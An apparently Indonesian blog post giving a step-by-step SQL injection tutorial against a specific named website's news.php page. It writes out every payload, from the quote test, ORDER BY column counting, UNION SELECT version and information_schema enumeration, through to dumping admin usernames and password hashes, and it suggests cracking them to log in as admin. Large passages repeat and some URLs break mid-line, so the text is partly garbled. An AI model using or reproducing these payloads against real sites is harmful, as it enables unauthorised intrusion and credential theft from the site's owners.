to the point.. talk less do more
target site:
http://www.itmaasia.com/news.php?id=10
udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya
http://www.itmaasia.com/news.php?id=10'
klo keluar tulisan error sql berarti webnya bisa di SQLi.
langkah berikutnya kita cari jumlah kolom. caranya make syntak
order by (jumlah kolom)--
kita terapkan pada site target jadinya
http://www.itmaasia.com/news.php?id=10 order by 300--
kalo ada tulisan :
target site:
http://www.itmaasia.com/news.php?id=10
udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya
http://www.itmaasia.com/news.php?id=10'
klo keluar tulisan error sql berarti webnya bisa di SQLi.
langkah berikutnya kita cari jumlah kolom. caranya make syntak
order by (jumlah kolom)--
kita terapkan pada site target jadinya
http://www.itmaasia.com/news.php?id=10 order by 300--
kalo ada tulisan :
Unknown column '300' in 'order clause'
itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga
http://www.itmaasia.com/news.php?id=10 order by 26--
error tadi gk keluar.. kita coba lagi make kolom 27
http://www.itmaasia.com/news.php?id=10 order by 27--
dan lagi error gk kluar?? kita coba lagi make kolom 28
http://www.itmaasia.com/news.php?id=10 order by 28--
ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..
setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak
depan id kasih tanda ( - )/kurang union select kolom1,2, n
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)
di target kita ngeluarin angka 3 & 11
itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga
http://www.itmaasia.com/news.php?id=10 order by 26--
error tadi gk keluar.. kita coba lagi make kolom 27
http://www.itmaasia.com/news.php?id=10 order by 27--
dan lagi error gk kluar?? kita coba lagi make kolom 28
http://www.itmaasia.com/news.php?id=10 order by 28--
ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..
setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak
depan id kasih tanda ( - )/kurang union select kolom1,2, n
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)
di target kita ngeluarin angka 3 & 11
selanjutnya kita cari versi databasenya.. caranya make syntak
@@Version pada nomor ajaib
penerapan dalam target kita (gw ambil yg 11)
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
muncul versi database
5.0.51b-community-nt
[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]
langkah selanjutnya kita cari informasi table caranya
memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
penerapan dalam target kita
http://www.itmaasia.com
@@Version pada nomor ajaib
penerapan dalam target kita (gw ambil yg 11)
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
muncul versi database
5.0.51b-community-nt
[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]
langkah selanjutnya kita cari informasi table caranya
memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
penerapan dalam target kita
http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--
nah muncul kan nama² tabel nya ada tabel admin tuh
langkah selanjutnya kita akan mengintip informasi di dalam table admin,
pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--
oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php
trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita
http://www.itmaasia.com
nah muncul kan nama² tabel nya ada tabel admin tuh
langkah selanjutnya kita akan mengintip informasi di dalam table admin,
pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--
oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php
trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita
http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e
keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya
group_concat(username,0x3a,password) tambahkan diakhir URL from admin
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin
wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......
selanjutnya terserah anda..
segala akibat ditanggung sendiri"..
keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya
group_concat(username,0x3a,password) tambahkan diakhir URL from admin
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..
penerapan dalam target kita
http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin
wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......
selanjutnya terserah anda..
segala akibat ditanggung sendiri"..
Sumber Tecon Indonesia
0 komentar:
Posting Komentar
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.